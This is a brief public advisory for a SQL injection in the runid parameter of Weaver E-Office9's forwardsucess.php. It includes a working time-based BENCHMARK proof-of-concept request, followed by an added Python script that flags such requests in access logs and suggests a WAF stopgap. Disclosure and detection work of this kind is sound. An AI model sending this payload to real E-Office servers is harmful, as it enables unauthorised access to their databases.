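Weaver E-Office9 forwardsucess.php runid parameter SQL injection vulnerability

Date: 2024-04-12 | Affected software: Weaver E-Office | PoC: public

Vulnerability description

The runid parameter of forwardsucess.php in Weaver E-Office9 is vulnerable to SQL injection.

PoC code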

GET /E-mobile/flow/forwardsucess.php?runid=1+AND+9926%3DBENCHMARK%280000000%2CMD5%280x6d63524%29%29&flowid=&flowprcs=&prcsid=&module=&scope=&page=&fromid=&detailid=&mobilesessionkey=&sessionkey=&diff=&contents=1&touserid=WV00000304 HTTP/1.1
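Detection example (added here, not part of the original advisory or of the vendor's code): a Python scan of web access logs for requests to this endpoint whose decoded runid is not a plain integer, which is how the BENCHMARK payload above shows up in a log. The combined log format, the assumption that a legitimate runid is a decimal ID, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter name come from the advisory; the path is compared
# case-insensitively in case the server's filesystem ignores case.
TARGET_PATH = "/e-mobile/flow/forwardsucess.php"
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# Keywords used only to label a finding, never to decide it.
HINT_RE = re.compile(r"\b(benchmark|sleep|union|select)\b", re.I)
# Assumption: a legitimate runid is a plain decimal record ID.
NUMERIC_RE = re.compile(r"[0-9]+")

def check_line(line):
    """Return a finding dict if the line hits the endpoint with a non-numeric runid."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    if parts.path.lower() != TARGET_PATH:
        return None
    # parse_qs decodes %XX and '+' once, so encoded payloads are compared decoded.
    for value in parse_qs(parts.query, keep_blank_values=True).get("runid", []):
        if value and not NUMERIC_RE.fullmatch(value):
            hints = sorted({h.lower() for h in HINT_RE.findall(value)})
            return {"client": line.split()[0], "runid": value, "hints": hints}
    return None

def scan(lines):
    """Return findings for every suspicious line, in input order."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2024:09:15:02 +0800] "GET /E-mobile/flow/'
    'forwardsucess.php?runid=1042&flowid=7&contents=1 HTTP/1.1" 200 512',
    '198.51.100.23 - - [12/Apr/2024:09:16:40 +0800] "GET /E-mobile/flow/'
    'forwardsucess.php?runid=1+AND+9926%3DBENCHMARK%280000000%2CMD5%280x6d63524'
    '%29%29&flowid=&contents=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [12/Apr/2024:09:17:11 +0800] "GET /E-mobile/index.php'
    '?runid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only check on runid, applied at a reverse proxy or WAF in front of the application, serves as a stopgap until the vendor fix is installed.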
